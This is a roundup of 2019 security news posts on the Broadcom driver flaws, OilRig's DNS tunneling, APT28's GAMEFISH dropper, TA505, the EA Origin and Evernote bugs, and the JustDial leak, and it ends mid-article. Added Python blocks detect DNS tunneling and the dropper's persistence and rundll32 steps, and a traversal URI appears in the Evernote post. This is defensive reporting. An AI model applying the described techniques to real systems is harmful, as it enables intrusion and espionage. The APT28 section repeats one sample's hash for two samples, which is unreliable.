The flaws, discovered by Hugues Anguelkov during his internship at Quarkslab, are tracked as CVE-2019-8564, CVE-2019-9500, CVE-2019-9501, CVE-2019-9502 and CVE-2019-9503.

The heap buffer overflows could be exploited to execute arbitrary code on vulnerable systems.

“You can find these chips almost everywhere from smartphones to laptops, smart-TVs and IoT devices. You probably use one without knowing it, for example if you have a Dell laptop, you may be using a bcm43224 or a bcm4352 card. It is also likely you use a Broadcom WiFi chip if you have an iPhone, a MacBook, a Samsung phone or a Huawei phone, etc.” reads the post published by Anguelkov.

“Since these chips are so widespread they constitute a high value target to attackers and any vulnerability found in them should be considered to pose high risk.”


According to the CERT/CC, “In the worst case scenario, by sending specially-crafted WiFi packets, a remote, unauthenticated attacker may be able to execute arbitrary code on a vulnerable system. More typically, these vulnerabilities will result in denial-of-service attacks.” In other words, a remote, unauthenticated attacker could exploit the flaws in the Broadcom WiFi chipset drivers by sending maliciously crafted WiFi packets to execute arbitrary code on vulnerable systems.

Anguelkov confirmed that two of those vulnerabilities affect both the Linux kernel and the firmware of the affected Broadcom chips.

The researcher pointed out that the most common exploitation scenario leads to a remote denial of service.

“Although it is technically challenging to achieve, exploitation for remote code execution should not be discarded as the worst case scenario.” Anguelkov adds.

Below the details for the flaws:

Vulnerabilities in the open source brcmfmac driver:

  • CVE-2019-9503: If the brcmfmac driver receives a firmware event frame from the host, the appropriate handler is called. It is possible to bypass frame validation when USB is used as the bus (for instance with a WiFi dongle). In this case, firmware event frames from a remote source will be processed.
  • CVE-2019-9500: A malicious event frame can be crafted to trigger a heap buffer overflow in the brcmf_wowl_nd_results function when the Wake-up on Wireless LAN functionality is configured. This flaw could be exploited by a compromised chipset to compromise the host or, when combined with the above frame validation bypass, remotely.

Vulnerabilities in the Broadcom wl driver:

Two heap buffer overflows can be triggered in the client when parsing an EAPOL message 3 during the 4-way handshake from the access point (AP).

  • CVE-2019-9501: By supplying a vendor information element with a data length larger than 32 bytes, a heap buffer overflow is triggered in wlc_wpa_sup_eapol.
  • CVE-2019-9502: If the vendor information element data length is larger than 164 bytes, a heap buffer overflow is triggered in wlc_wpa_plumb_gtk.

NOTE: When the wl driver is used with SoftMAC chipsets, these vulnerabilities are triggered in the host’s kernel. When a FullMAC chipset is being used, these vulnerabilities would be triggered in the chipset’s firmware.

The researcher published a timeline for the vulnerabilities that include information on patches released by some vendors.

Pierluigi Paganini

(SecurityAffairs – hacking, Broadcom WiFi chipset)

The post Broadcom WiFi Driver bugs expose devices to hack appeared first on Security Affairs.

Analyzing OilRig’s malware that uses DNS Tunneling

Iran-linked APT group OilRig is heavily leveraging on DNS tunneling for its cyber espionage campaigns, Palo Alto Networks reveals.

Security researchers at Palo Alto Networks reported that the Iran-linked APT group OilRig is heavily leveraging DNS tunneling for its cyber espionage campaigns.

OilRig is an Iran-linked APT group that has been around since at least 2014, it targeted mainly organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.

Much of the malware used by the group in its attacks over the years uses DNS tunneling to protect communications with the command and control (C&C) infrastructure.

Experts pointed out that DNS tunneling clearly represents one of the preferred communication methods of the group.

OilRig’s usage of DNS tunneling was first documented in 2016; some of the Trojans in its arsenal using it are Helminth, ISMAgent, QUADAGENT, BONDUPDATER, and ALMACommunicator.


The analysis of the tunneling protocols used by OilRig shows that:

  • All subdomains contain a randomly generated value to avoid the DNS query resulting in a cached response
  • Most rely on an initial handshake to obtain a unique system identifier
  • Most rely on hardcoded IP addresses within the DNS answers to start and stop data transfer
  • Data upload includes a sequence number that allows the C2 to reconstruct the uploaded data in the correct order
  • Depending on the tool, A, AAAA, and TXT query types have been used by OilRig for tunneling
  • All of the DNS tunneling protocols will generate a significant number of DNS queries

“Regardless of the tool, all of the DNS tunneling protocols use DNS queries to resolve specially crafted subdomains to transmit data to the C2 and the answers to these queries to receive data from the C2.” reads the analysis published by Palo Alto Networks. “Therefore, the protocols must abide by the DNS protocol, so the specially crafted subdomains must have labels (portions of the subdomain separated by periods) must start and end with a letter or digit, contain letters, digits and hyphens and be less than 63 characters in length. Also, the entire domain queried, which includes the C2 domain and the specially crafted subdomain cannot exceed 253 characters.”

All the tools leverage DNS queries to resolve specially crafted subdomains and send data to the command and control servers. The tools use the protocols in different ways: they differ in the structure of the subdomains queried, in the data received by the Trojans, and in the subdomains used to transmit data.

Experts observed multiple variants of the Helminth backdoor over the years, all using DNS A queries, but the threat actors changed the generated subdomains to avoid detection.

“There are several variants of Helminth, as the OilRig actors actively developed this Trojan during the course of their attack campaigns. The Helminth Trojan came in two forms, a portable executable version and a PowerShell version, both of which received updates to their DNS tunneling protocol over time.” continues the analysis. “The DNS tunneling protocols used in each variant operated the same way, but the developer would make changes to the generated subdomains to make them look visually different to evade detection.”

OilRig also used the ISMAgent in many campaigns, the malware uses the DnsQuery_A API function to issue DNS AAAA requests to resolve custom subdomains. Before transmitting the data, the Trojan issues a beacon to inform the server it is ready.

OilRig also leveraged two variants of the ALMA Communicator in its attacks, each using a different domain structure. The two variants sent different information to the server and formatted the data within the DNS tunneling protocol in different ways.

Palo Alto researchers also documented different variants of both the BONDUPDATER tool and QUADAGENT Trojan, the latter uses AAAA queries to transmit/receive data via DNS tunneling.

“This threat group saw the benefits of using DNS tunneling, as DNS is almost universally allowed through security devices.” Palo Alto Networks concludes. “One major drawback of using DNS tunneling is the high volume of DNS queries issued to transmit data back and forth between the tool and the C&C server, which may stand out to those monitoring DNS activity on their networks,”
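Added example, not code from Palo Alto Networks or from the tools discussed: a triage of the traits listed above (query volume, never-repeating random subdomains, sequence-number labels, AAAA/TXT share, DNS length limits) over constructed resolver log lines. Domain names, clients and the two-label registrable-domain assumption are all made up for illustration.

```python
"""Added example (not Palo Alto Networks' code): DNS tunneling triage over
constructed resolver log lines, scoring each registered domain on the
traits described in the analysis."""
import math
from collections import defaultdict

# Constructed log lines, "<client> <query name> <query type>" (not real traffic).
SAMPLE_LOG = """
10.0.0.5 www.example-news.test A
10.0.0.5 www.example-news.test A
10.0.0.5 cdn.example-news.test AAAA
10.0.0.7 a91f3c0d2b77.1.4f8e.c2-domain.test AAAA
10.0.0.7 b20c7e19aa01.2.4f8e.c2-domain.test AAAA
10.0.0.7 c7d4e6f0b3a9.3.4f8e.c2-domain.test AAAA
10.0.0.7 d1e9a8c2f4b6.4.4f8e.c2-domain.test AAAA
10.0.0.7 e5f3b7d9a0c1.5.4f8e.c2-domain.test TXT
10.0.0.7 f8a2c4e6b0d3.6.4f8e.c2-domain.test TXT
10.0.0.9 mail.example-news.test A
""".strip().splitlines()


def registered_domain(qname: str) -> str:
    # Assumption: the registrable domain is the last two labels (no suffix list).
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])


def fits_dns_limits(qname: str) -> bool:
    """Limits the tunnel must respect: labels of 1-63 characters and a whole
    name of at most 253 characters."""
    name = qname.rstrip(".")
    return len(name) <= 253 and all(1 <= len(l) <= 63 for l in name.split("."))


def shannon_entropy(text: str) -> float:
    """Bits per character: random hex labels score near 3.5, words far less."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_line(line: str):
    client, qname, qtype = line.split()
    return client, qname.lower().rstrip("."), qtype.upper()


def analyze(lines, min_queries: int = 5) -> dict:
    """Per registered domain, compute the tunneling traits and a verdict."""
    per_domain = defaultdict(list)
    for line in lines:
        if line.strip():
            rec = parse_line(line)
            per_domain[registered_domain(rec[1])].append(rec)

    report = {}
    for domain, records in per_domain.items():
        names = [q for _, q, _ in records]
        subs = [q[: -len(domain) - 1] for q in names]      # "" when q == domain
        first_labels = [s.split(".")[0] for s in subs if s]
        # Sequence-number trait: an all-digit label that increases by one
        # across successive queries, as the upload protocols do.
        nums = [int(l) for s in subs for l in s.split(".") if l.isdigit()]
        sequential = len(nums) >= 3 and all(b - a == 1 for a, b in zip(nums, nums[1:]))
        queries = len(records)
        stats = {
            "queries": queries,
            "unique_ratio": len(set(names)) / queries,
            "aaaa_txt_share": sum(t in ("AAAA", "TXT") for _, _, t in records) / queries,
            "mean_entropy": (sum(map(shannon_entropy, first_labels)) / len(first_labels)
                             if first_labels else 0.0),
            "longest_label": max((len(l) for s in subs if s for l in s.split(".")), default=0),
            "sequential_counter": sequential,
            "all_within_limits": all(map(fits_dns_limits, names)),
        }
        stats["suspicious"] = (
            queries >= min_queries
            and stats["unique_ratio"] >= 0.9
            and stats["mean_entropy"] >= 3.0
            and (stats["aaaa_txt_share"] >= 0.5 or sequential)
        )
        report[domain] = stats
    return report


def suspicious_domains(lines) -> list:
    return sorted(d for d, s in analyze(lines).items() if s["suspicious"])
```

The thresholds are starting points for a hunt, not tuned rules; the query-volume trait is the one the analysis itself singles out as the tunnel's weak spot for defenders.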

Pierluigi Paganini

(SecurityAffairs – hacking, OilRig)

The post Analyzing OilRig’s malware that uses DNS Tunneling appeared first on Security Affairs.

This Week in Security News: Medical Malware and Monitor Hacks

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how baby monitors may be susceptible to hacking. Also, learn about a medical flaw that enables hackers to hide malware.

Read on:

Is Your Baby Monitor Susceptible to Hacking?

In a number of high-profile cases, home surveillance cameras have been easily compromised, and disturbing reports of hacked baby monitors are in the news.

Global Governments Demonstrate Rising Commitment to Cybersecurity

According to the International Telecommunications Union’s (ITU) 2018 Global Cybersecurity Index, only half of countries around the globe had a government cybersecurity strategy in 2017, which rose to 58 percent in 2018.

What Did We Learn from the Global GPS Collapse?

The problem highlights the pervasive disconnect between the worlds of IT and OT.

Malware Creates Cryptominer Botnet Using EternalBlue and Mimikatz

A malware campaign is actively attacking Asian targets using the EternalBlue exploit and taking advantage of Living off the Land (LotL) obfuscated PowerShell-based scripts to drop Trojans and a Monero coinminer on compromised machines.

Medical Format Flaw Can Let Attackers Hide Malware in Medical Images

Research into DICOM has revealed that the medical file format in medical images has a flaw that can give threat actors a new way to spread malicious code through these images.

Hackers Could Read Your Hotmail, MSN, and Outlook Emails by Abusing Microsoft Support

A hacker or group of hackers broke into a customer support account for Microsoft, and then used that to gain access to information related to customers’ email accounts such as the subject lines of their emails and who they’ve communicated with.

New Business Email Compromise Scheme Reroutes Paycheck by Direct Deposit

A new business email compromise (BEC) scheme, where the attacker tricks the recipients into rerouting paychecks by direct deposit, has emerged.

Leadership Turnover at DHS and Secret Service Could Hurt US Cybersecurity Plans

Departures of top officials at the Secret Service and Department of Homeland Security (DHS) will add to an already difficult public-private disconnect on cybersecurity, especially since Kirstjen Nielsen has a rare set of cybersecurity skills that helped the DHS protect companies in critical industries.

Microsoft Disclosed Security Breach From Compromised Support Agent’s Credentials

Microsoft has notified affected Outlook users of a security breach that allowed hackers access to email accounts from January 1 to March 28, 2019.

Do you think the leadership turnover at DHS and the Secret Service will hurt US cybersecurity plans? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Medical Malware and Monitor Hacks appeared first on .

APT28 and Upcoming Elections: evidence of possible interference (Part II)

In mid-March, a suspicious Office document referencing the Ukraine elections appeared in the wild, is it related to APT28 and upcoming elections?

Introduction

The uncertain attribution of the Ukrainian themed malicious document discussed in our past article “APT28 and Upcoming Elections: Possible Interference Signals”, led us to a review of Sofacy’s phishing techniques to confirm or deny the possible involvement of Russian state-sponsored actors in the election interference. We ended up in an old fake Hotel reservation request form, containing dummy interactive text boxes used to lure the victims to enable the macro code execution. 

We analyzed this sample two years ago and linked it to a Sofacy attack operation discovered by FireEye (FE) researchers in mid-2017, which hit several hotels in European and Middle Eastern countries.

Technical Analysis

Sha256: a4a455db9f297e2b9fe99d63c9d31e827efb2cda65be445625fa64f4fce7f797
Threat: APT28 GAMEFISH
Brief Description: GAMEFISH document dropper (reference sample, 2017)
Ssdeep: 1536:009J0E4v13p/gL7Jj4P9bvzKGXpIiUvh23oKRO/HhcKmFoR:fb4v13pYL7J49bvr5Iias32Jc5FoR

The macro code inside the 2017 document is password protected, just like the last suspicious document we analyzed to investigate a possible Ukraine elections interference by Russian groups. After its opening, the reference sample decodes the extracted Base64 content using a custom “DecodeBase64” function:

Figure 1: Custom Base64 decryption routine

The decoded content is actually a DLL file which is written to “%AppData%\user.dat”. After that, it is executed through an ASR (Attack Surface Reduction) bypass technique that allows attackers to run a new child process from within the Office environment. This is the same publicly available exploit previously found in the Ukrainian sample (more details in the next section).

Figure 2: Technique used to bypass Microsoft ASR protection

In this reference sample, the “user.dat”’s purpose is to create two new artifacts and to set persistence through “HKCU\Environment->UserInitMprLogonScript”. The created files are:

  • %AppData%\mrset.bat
  • %AppData%\mvtband.dat

Figure 3: Persistence setting and artifacts creation by “user.dat” file

The “mrset.bat” file is a short batch file, designed to check whether “mvtband.dat” exists and to run it through the “rundll32.exe” system utility.

Figure 4: “mrset.bat” file code

Finally, the “mvtband.dat” file, which is actually a Delphi DLL library, is a well-known malware named “GAMEFISH” (f9fd3f1d8da4ffd6a494228b934549d09e3c59d1). Russian groups have used it in reconnaissance phases to steal information from the victim machine and to implant new payloads. 

Figure 5: Information retrieved by mvtband.dll
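The infection chain above (Office process spawning a child, the UserInitMprLogonScript persistence value, and rundll32 loading a non-DLL file from %AppData%) translates into three host-level detections. The following is an added example, not code from the article or from Yoroi: it runs those checks over Sysmon-style events, with a constructed sample set embedded (SID, user name and rundll32 export are placeholders; file names are the ones from the article).

```python
"""Detection logic for the GAMEFISH dropper chain described above.

Added example, not code from the original article. Three defender-side
checks over Sysmon-style events (constructed sample data below):

  1. an Office process creating a child process (the effect of the ASR bypass);
  2. a registry value set on HKCU\\Environment\\UserInitMprLogonScript
     (the persistence mechanism used by "user.dat");
  3. rundll32.exe loading a module from %AppData% whose name does not end
     in .dll (as "mrset.bat" does with "mvtband.dat").

Event IDs follow Sysmon: 1 = ProcessCreate, 13 = RegistryEvent (value set).
"""
from dataclasses import dataclass
import re

OFFICE_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    event_id: int
    detail: str


def _basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_office_child(ev: dict):
    """Rule 1: Office applications normally do not spawn child processes."""
    if ev.get("EventID") != 1:
        return None
    parent = _basename(ev.get("ParentImage", ""))
    if parent in OFFICE_PROCESSES:
        return Finding("office_spawns_child", 1,
                       f"{parent} -> {_basename(ev.get('Image', ''))}")
    return None


def check_logon_script_persistence(ev: dict):
    """Rule 2: UserInitMprLogonScript runs its value at every interactive logon."""
    if ev.get("EventID") != 13:
        return None
    target = ev.get("TargetObject", "").lower()
    if target.endswith("\\environment\\userinitmprlogonscript"):
        return Finding("userinit_logon_script", 13,
                       f"{ev.get('TargetObject')} = {ev.get('Details')}")
    return None


# First argument of rundll32: optional opening quote, then the module path
# up to a quote, comma or whitespace.
_RUNDLL_ARG = re.compile(r'rundll32(?:\.exe)?\s+"?([^",\s]+)', re.IGNORECASE)


def check_rundll32_nondll(ev: dict):
    """Rule 3: rundll32 loading a non-.dll file from a user profile directory."""
    if ev.get("EventID") != 1 or _basename(ev.get("Image", "")) != "rundll32.exe":
        return None
    match = _RUNDLL_ARG.search(ev.get("CommandLine", ""))
    if not match:
        return None
    module = match.group(1)
    if "\\appdata\\" in module.lower() and not module.lower().endswith(".dll"):
        return Finding("rundll32_nondll_appdata", 1, module)
    return None


CHECKS = (check_office_child, check_logon_script_persistence, check_rundll32_nondll)


def scan(events):
    """Apply every rule to every event; return the list of findings in order."""
    findings = []
    for ev in events:
        for check in CHECKS:
            hit = check(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed sample events (not real telemetry). The SID, user name and the
# rundll32 export ("#1") are placeholders; mrset.bat / mvtband.dat are the
# artifact names from the article. The last three events are benign noise.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\alice\AppData\Roaming\mrset.bat"'},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Environment\UserInitMprLogonScript",
     "Details": r"C:\Users\alice\AppData\Roaming\mrset.bat"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe "C:\Users\alice\AppData\Roaming\mvtband.dat",#1'},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Environment\Path",
     "Details": r"C:\Users\alice\bin"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] event {f.event_id}: {f.detail}")
```

Rule 1 fires on any Office child process and will need an allow-list in a real estate; rules 2 and 3 are narrow enough to alert on directly.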

Comparison with Ukrainian Elections Sample

Sha256: a4a455db9f297e2b9fe99d63c9d31e827efb2cda65be445625fa64f4fce7f797
Threat: APT28 GAMEFISH
Brief Description: GAMEFISH document dropper (reference sample, 2017)
Ssdeep: 1536:009J0E4v13p/gL7Jj4P9bvzKGXpIiUvh23oKRO/HhcKmFoR:fb4v13pYL7J49bvr5Iias32Jc5FoR

Despite some differences between the “Hospitality campaign” vector and the Ukraine elections one, both use similar TTPs associated with the APT28 group. The link between the Hospitality malware and the “FancyBear” actor has already been established by the InfoSec community. So, we can use the similarities between it and the Ukrainian elections sample to link the latter to Russian hacker groups.

Both documents under analysis use password-protected macro code. None of the code inside the macros is obfuscated in any way; the Hospitality document surprisingly contains code comments too. Moreover, the main macro function is named “Execute” in both documents, and the ASR trick used to create new processes from the Office workspace is substantially the same.

Figure 6. The Ukraine elections macro on the left; Hospitality’s one on the right.

In both cases the real payload is encoded in Base64 and it is stored into an Office hidden section: the first sample uses a document property, the second one employs an XML resource. 

The next stages are different: the Ukraine sample deploys some obfuscated PowerShell scripts, which in the end carry an Empire stager, allowing the attackers to interact directly with the victim machine; the reference sample, instead, implants the GAMEFISH malware, which automatically exfiltrates victim information while waiting for new payloads to install.

Conclusion

Finally, the attribution of the Ukraine elections sample (highlighted in our previous report) can be confirmed by its strong similarities with the first stage of Sofacy’s Hospitality malware:

  • Both use password protection.
  • Both have the same function name.
  • Both have the same macro code structure.
  • Both embed the real payload in a hidden document section.
  • The ASR trick is implemented using the same instructions.

The presence of these similarities between the droppers indicates, with high probability, that the attacker is the same, and consequently suggests that APT28 is reusing some 2017 tricks and code snippets which, despite their simplicity, make its attacks effective.

Further details, including Indicators of Compromise and Yara rules, are reported in the analysis published on the Yoroi Blog.
Stay Tuned.  

Pierluigi Paganini

(SecurityAffairs – Ukraine, APT28)

The post APT28 and Upcoming Elections: evidence of possible interference (Part II) appeared first on Security Affairs.

New DNS Hijacking Attacks

DNS hijacking isn't new, but this seems to be an attack of unprecedented scale:

Researchers at Cisco's Talos security division on Wednesday revealed that a hacker group it's calling Sea Turtle carried out a broad campaign of espionage via DNS hijacking, hitting 40 different organizations. In the process, they went so far as to compromise multiple country-code top-level domains -- the suffixes like .co.uk or .ru that end a foreign web address -- putting all the traffic of every domain in multiple countries at risk.

The hackers' victims include telecoms, internet service providers, and domain registrars responsible for implementing the domain name system. But the majority of the victims and the ultimate targets, Cisco believes, were a collection of mostly governmental organizations, including ministries of foreign affairs, intelligence agencies, military targets, and energy-related groups, all based in the Middle East and North Africa. By corrupting the internet's directory system, hackers were able to silently use "man in the middle" attacks to intercept all internet data from email to web traffic sent to those victim organizations.

[...]

Cisco Talos said it couldn't determine the nationality of the Sea Turtle hackers, and declined to name the specific targets of their spying operations. But it did provide a list of the countries where victims were located: Albania, Armenia, Cyprus, Egypt, Iraq, Jordan, Lebanon, Libya, Syria, Turkey, and the United Arab Emirates. Cisco's Craig Williams confirmed that Armenia's .am top-level domain was one of the "handful" that were compromised, but wouldn't say which of the other countries' top-level domains were similarly hijacked.

Another news article.

Russian TA505 threat actor target financial entities worldwide

Russian financially motivated threat actor TA505 used remote access Trojans (RATs) in attacks on financial entities in the United States and worldwide.

Security experts at CyberInt uncovered a new campaign of a Russian financially motivated threat actor tracked as TA505. The hackers used remote access Trojans (RATs) in attacks aimed at financial entities in the United States and worldwide.

“CyberInt researchers have been tracking various activities following the spear-phishing campaign targeting large US-based retailers detected in December 2018.” reads the analysis published by Cyberint. “The research focused on scenarios with the same tactics, techniques and procedures (TTP) along with the repeated nefarious use of a ‘legitimate’ remote administration tool ‘Remote Manipulator System’ (RMS), developed by a Russian-based company ‘TektonIT’.”

The TA505 group was first spotted by Proofpoint back in 2017; it has been active at least since 2015 and targets organizations in the financial and retail industries.

The group carried out a large number of campaigns using weaponized Office and PDF documents to deliver notorious malware, including the Dridex banking trojan, tRAT, FlawedAmmyy RAT, Philadelphia ransomware, GlobeImposter and Locky ransomware.

Tracked by the research community as TA505, the Russian threat group is known for the use of banking Trojans such as Shifu and Dridex, as well as for the massive Locky ransomware campaigns observed several years ago.

In recent attacks the experts observed the group using new backdoors, including the modular tRat and ServHelper.

In campaigns carried out between December 2018 and February 2019, the TA505 group leveraged the Remote Manipulator System (RMS) backdoor to target financial institutions in Chile, India, Italy, Malawi, Pakistan and South Korea, and retailers in the United States.

In December 2018 the group also targeted large US retailers and organizations in the food and beverage industry with spear-phishing attacks. The phishing messages used a weaponized Word document containing a Visual Basic for Applications (VBA) macro. The macro downloads a payload from the command and control (C&C) server; the last stage of the attack chain is the RMS RAT.

The investigation conducted by the researchers allowed them to uncover other campaigns conducted between December 2018 and March 2019.

Hackers hit targets in many countries worldwide, including Chile, India, Italy, Malawi, Pakistan and South Korea. Researchers believe that other attacks against targets in China, Great Britain, France and the United States could be attributed to the same threat actor.

The weaponized documents used in the attacks leverage Microsoft Windows Installer to fetch a payload from the C2 and execute it.

“This behaviour is consistent with other TA505 campaigns utilising a combination of weaponised Microsoft Office files containing either VBA macros or exploit code to spawn additional processes.” continues the analysis published by Cyberint. “Of the spreadsheet lures analysed in this campaign, four different C2 servers and payloads were identified, with each likely being unique to a specific target organization or victim cluster.”

Experts also observed the attackers using the ServHelper RAT since November 2018; it allows them to set up reverse SSH tunnels for remote access to the compromised machine via RDP.


The report states that indicators of compromise identified in the campaigns against the US retail campaign are consistent with an attack against the Notary Chamber of Ukraine conducted by the same threat actor in December 2018.

At the time, the threat actor was delivering the RMS Trojan in spear-phishing attack.

Further technical details on the attacks are included in the report published by Cyberint.

Pierluigi Paganini

(SecurityAffairs – hacking, VSDC)

The post Russian TA505 threat actor target financial entities worldwide appeared first on Security Affairs.

RCE flaw in Electronic Arts Origin client exposes gamers to hack

Electronic Arts (EA) has fixed a security issue in the Windows version of its gaming client Origin that allowed hackers to remotely execute code on an affected computer.

Electronic Arts (EA) has addressed a vulnerability in the Windows version of its gaming client Origin that allowed hackers to remotely execute code on an affected computer.

Electronic Arts already released a security patch for the remote code execution vulnerability. The Origin app on Windows is used by tens of millions of gamers. The Origin client for macOS was not affected by this flaw.

The flaw was reported by security experts Dominik Penner and Daley Bee from Underdog Security.

“We located a client-sided template injection, where we proceeded to use an AngularJS sandbox escape and achieve RCE by communicating with QtApplication’s QDesktopServices.” reads a blog post published by Underdog Security.

“To make it easier to access an individual game’s store from the web, the client has its own URL scheme that allows gamers to open the app and load a game from a web page by clicking a link with origin:// in the address.” reported Techcrunch.

“But two security researchers, Daley Bee and Dominik Penner of Underdog Security, found that the app could be tricked into running any app on the victim’s computer.”

The experts shared a proof-of-concept code with Techcrunch to trigger the issue.

Researchers pointed out that the code allowed any app to run at the same level of privileges as the logged-in user. In the following image, the security duo popped open the Windows calculator remotely.


“But worse, a hacker could send malicious PowerShell commands, an in-built app often used by attackers to download additional malicious components and install ransomware.” continues the post.

An attacker could craft a malicious link and send it to the victims via email or include it on a webpage; the issue could also be triggered if the malicious code was combined with a cross-site scripting exploit that ran automatically in the browser.

The flaw can also be exploited by an attacker to take over gamers’ accounts by stealing the access token with just a single line of code.

Pierluigi Paganini

(SecurityAffairs – hacking, Electronic Arts)

The post RCE flaw in Electronic Arts Origin client exposes gamers to hack appeared first on Security Affairs.

Code execution – Evernote

A local file path traversal issue exists in Evernote 7.9 for macOS which allows an attacker to execute arbitrary programs.

Technical observation:

A crafted URI can be used in a note to perform this attack, using file:/// as an argument or by traversing to any directory like (../../../../something.app).

Since Evernote also has a feature of sharing notes, in such a case an attacker could leverage this vulnerability and send crafted notes (.enex) to the victim to perform further attacks.


Patch: 
A patch for this issue was released in Evernote 7.10 Beta 1 and 7.9.1 GA for macOS [MACOSNOTE-28840]. CVE-2019-10038 was assigned to this issue.

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj_)

Original post at:

https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html

Pierluigi Paganini

(Security Affairs – Evernote, hacking)

The post Code execution – Evernote appeared first on Security Affairs.

Justdial is leaking personal details of all customers real-time

A database belonging to the Indian local search service JustDial was left online without protection exposing personal data of over 100M users.

The archive is still leaking personally identifiable information of more than JustDial customers that are accessing the service via its website, mobile app, or even by calling on the customer care number (“88888 88888”).

The news was first reported by The Hacker News that independently verified the authenticity of the story.

JustDial is the largest and oldest search engine in India that allows its users to find vendors of various products and services.

The independent researcher Rajshekhar Rajaharia discovered how an unprotected, publicly accessible API endpoint of JustDial’s database can be accessed by anyone.

The leaked data includes username, email, mobile number, address, gender, date of birth, photo, occupation, company name and other.

According to the expert, the data has remained exposed since at least mid-2015 through the unprotected API; at the time, it is not clear whether anyone had accessed the huge trove of data.


Experts at THN provided Rajshekhar with a new phone number that had never before been registered with the JustDial server, then used it to contact the JustDial service and request information on restaurants. The service created a profile and associated it with the number provided by THN. Rajshekhar was able to access that profile, which confirmed that the exposed DB was the one associated with production systems.

“Although the unprotected API is connected to the primary JD database, Rajshekhar revealed that it’s an old API endpoint which is not currently being used by the company but left forgotten on the server.” reads the post published by THN.

Rajshekhar discovered this unprotected end-point while conducting a penetration test on the latest APIs, which are apparently protected.

Rajshekhar also found other issues associated with the old unprotected APIs; one of them could be exploited by anyone to trigger an OTP request for any registered phone number, making it possible to spam users.

Rajshekhar attempted to report the issues to the company but without success.

Pierluigi Paganini

(SecurityAffairs – hacking, JustDial)

The post Justdial is leaking personal details of all customers real-time appeared first on Security Affairs.

Maliciously Tampering with Medical Imagery

In what I am sure is only a first in many similar demonstrations, researchers are able to add or remove cancer signs from CT scans. The results easily fool radiologists.

I don't think the medical device industry has thought at all about data integrity and authentication issues. In a world where sensor data of all kinds is undetectably manipulatable, they're going to have to start.

Research paper. Slashdot thread.

UK hacker jailed for six years for blackmailing pornography site users

Zain Qaiser targeted millions of computers with ransomware demanding large sums

A hacker who blackmailed users of pornography websites in what investigators say is the UK’s most serious cybercrime case has been jailed for six years and five months.

Zain Qaiser targeted millions of computers with malicious browser-locking software that demanded payment of up to $1,000 (£765) to unfreeze screens, Kingston crown court heard.

Continue reading...

Are Hackers Threatening the Adoption of Self-Driving Cars?

Automotive manufacturers have realized the future lies in self-driving cars. We may be taking small steps, yet we would like to be headed to an autonomous driving utopia. Here, every road is safe, smart, connected, fast, reliable.

It may be just a dream right now, but how far are we from achieving this goal?

In this article, we will walk you through the current state of autonomous vehicles, and most importantly, examine how safe driverless cars actually are from a cybersecurity perspective.

A brief history of self-driving cars

Let’s start off with a little bit of history.

You may be amazed to hear that people started working on driverless car prototypes as early as the 1920s. Back then, a radio-controlled car was invented by Francis Houdina, which he controlled without a person behind the steering wheel on the streets of New York.

Impressive, right?

Throughout time, there have been multiple attempts to develop the industry and encourage driverless cars’ adoption. You can access this resource to go through a quick timeline of self-driving cars.

Fast forward to more recent days: Waymo, formerly known as Google’s self-driving car project, is the first commercial self-driving car and was launched in December 2018. Through an app, Waymo offers ride-hailing services to people in the Phoenix area of the United States.

Will 2019 be the year of self-driving cars?

Here are a few facts and predictions for 2019:

  • This year, companies such as General Motors, Uber, Volkswagen, and Intel are competing in the ride-hailing movement and are making promises regarding when their fully autonomous vehicles will be available. The general answer seems to be between 2019 and 2022.
  • Elon Musk, CEO of Tesla, is expecting to see Tesla’s self-driving feature fully available by 2020.
  • The UK government has announced its commitment to having completely autonomous vehicles on the roads by 2021.
  • 2019 will be the year of Level 4 autonomous vehicles.

Did you know a car can have six automation levels?

In the image below you can see exactly what Level 0 to Level 5 actually mean.


How do people view self-driving cars?

Autonomous vehicle manufacturers promise to deliver a safe, enjoyable, and fast experience, freeing the drivers of the stress of driving, while allowing them to fulfill other tasks.

But what is the general opinion towards autonomous cars?

According to Deloitte’s 2019 Global Automotive Study, consumer perception of the safety of autonomous cars has stalled in the last year. This attitude is predominantly influenced by media reports of accidents involving self-driving cars, many of which were fatal.

Here you can read a report on this type of accident.

Source: Deloitte

The concern around safety is also reinforced by Perkins Coie’s research, which shows that consumers’ perception of safety is the biggest roadblock to the development of self-driving vehicles in the next five years.

As per another study conducted by the American Automobile Association (AAA), almost 3 in 4 Americans are afraid of self-driving cars. According to the same research, only 19% would trust self-driving cars to transport their loved ones.

What’s more, there are some people who seem to despise the autonomous vehicle’s technology and even manifest violent behavior towards it. At least 21 attacks against Waymo cars have been reported. People have tried to run the vehicles off the road, thrown rocks at them, slashed the tires, or even yelled at them to leave the neighborhood. This behavior seems to be fueled by people’s concern with safety and even potential job losses.

Some also believe self-driving will most likely cause traffic congestions.

